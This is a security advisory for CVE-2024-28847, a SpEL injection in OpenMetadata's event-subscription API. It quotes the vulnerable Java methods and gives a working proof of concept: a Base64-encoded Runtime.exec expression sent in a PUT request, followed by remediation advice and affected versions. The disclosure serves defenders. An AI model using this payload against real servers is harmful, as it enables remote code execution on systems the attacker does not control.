GHSA-8p5r-6mvv-2435
- Source
- https://github.com/advisories/GHSA-8p5r-6mvv-2435
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-8p5r-6mvv-2435/GHSA-8p5r-6mvv-2435.json
- Aliases
-
- CVE-2024-28847
- Published
- 2024-04-24T17:06:00Z
- Modified
- 2024-04-24T17:28:25.939966Z
- Details
-
SpEL Injection in
PUT /api/v1/events/subscriptions(GHSL-2023-251)Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.
Similarly to the GHSL-2023-250 issue,
AlertUtil::validateExpressionis also called fromEventSubscriptionRepository.prepare(), which can lead to Remote Code Execution.@Override public void prepare(EventSubscription entity, boolean update) { validateFilterRules(entity); } private void validateFilterRules(EventSubscription entity) { // Resolve JSON blobs into Rule object and perform schema based validation if (entity.getFilteringRules() != null) { List<EventFilterRule> rules = entity.getFilteringRules().getRules(); // Validate all the expressions in the rule for (EventFilterRule rule : rules) { AlertUtil.validateExpression(rule.getCondition(), Boolean.class); } rules.sort(Comparator.comparing(EventFilterRule::getName)); } }prepare()is called fromEntityRepository.prepareInternal()which, in turn, gets called from theEntityResource.createOrUpdate():public Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) { repository.prepareInternal(entity, true); // If entity does not exist, this is a create operation, else update operation ResourceContext<T> resourceContext = getResourceContextByName(entity.getFullyQualifiedName()); MetadataOperation operation = createOrUpdateOperation(resourceContext); OperationContext operationContext = new OperationContext(entityType, operation); if (operation == CREATE) { CreateResourceContext<T> createResourceContext = new CreateResourceContext<>(entityType, entity); authorizer.authorize(securityContext, operationContext, createResourceContext); entity = addHref(uriInfo, repository.create(uriInfo, entity)); return new PutResponse<>(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse(); } authorizer.authorize(securityContext, operationContext, resourceContext); PutResponse<T> response = repository.createOrUpdate(uriInfo, entity); addHref(uriInfo, response.getEntity()); return response.toResponse(); }Note that, even though there is an authorization check (
authorizer.authorize()), it gets called afterprepareInternal()gets called and, therefore, after the SpEL expression has been evaluated.In order to reach this method, an attacker can send a PUT request to
/api/v1/events/subscriptionswhich gets handled byEventSubscriptionResource.createOrUpdateEventSubscription():@PUT @Operation( operationId = "createOrUpdateEventSubscription", summary = "Updated an existing or create a new Event Subscription", description = "Updated an existing or create a new Event Subscription", responses = { @ApiResponse( responseCode = "200", description = "create Event Subscription", content = @Content( mediaType = "application/json", schema = @Schema(implementation = CreateEventSubscription.class))), @ApiResponse(responseCode = "400", description = "Bad request") }) public Response createOrUpdateEventSubscription( @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreateEventSubscription create) { // Only one Creation is allowed for Data Insight if (create.getAlertType() == CreateEventSubscription.AlertType.DATA_INSIGHT_REPORT) { try { repository.getByName(null, create.getName(), repository.getFields("id")); } catch (EntityNotFoundException ex) { if (ReportsHandler.getInstance() != null && ReportsHandler.getInstance().getReportMap().size() > 0) { throw new BadRequestException("Data Insight Report Alert already exists."); } } } EventSubscription eventSub = getEventSubscription(create, securityContext.getUserPrincipal().getName()); Response response = createOrUpdate(uriInfo, securityContext, eventSub); repository.updateEventSubscription((EventSubscription) response.getEntity()); return response; }This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query.
Proof of concept
- Prepare the payload
- Encode the command to be run (eg:
touch /tmp/pwned) using Base64 (eg:dG91Y2ggL3RtcC9wd25lZA==) - Create the SpEL expression to run the system command:
T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))
- Encode the command to be run (eg:
- Send the payload using a valid JWT token:
PUT /api/v1/events/subscriptions HTTP/1.1 Host: localhost:8585 Authorization: Bearer <non-admin JWT> accept: application/json Connection: close Content-Type: application/json Content-Length: 353 { "name":"ActivityFeedAlert","displayName":"Activity Feed Alerts","alertType":"ChangeEvent","filteringRules":{"rules":[ {"name":"pwn","effect":"exclude","condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]},"subscriptionType":"ActivityFeed","enabled":true } - Verify that a file called
/tmp/pwnedwas created in the OpenMetadata serverImpact
This issue may lead to Remote Code Execution.
Remediation
Use
SimpleEvaluationContextto exclude references to Java types, constructors, and bean references. - Prepare the payload
- References
-
- https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-8p5r-6mvv-2435
- https://nvd.nist.gov/vuln/detail/CVE-2024-28847
- https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection
- https://github.com/open-metadata/OpenMetadata
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289
- https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata
Affected packages
Maven / org.open-metadata:openmetadata-service
Package
- Name
- org.open-metadata:openmetadata-service
Affected versions
Other
DEMO_BETA1
0.*
0.12.1
0.12.1.preview
0.12.2
0.12.2-REPUBLISHED
0.13.1
0.13.2-beta
0.13.2
1.*
1.0.0-alpha
1.0.0-beta
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.4.1
1.0.5
1.1.0-beta
1.1.0
1.1.1
1.1.2
1.1.2.1
1.1.3
1.1.4
1.1.5
1.1.6
1.1.7
1.2.0-beta
1.2.0-beta1
1.2.0-beta2
1.2.0
1.2.1
1.2.2
1.2.3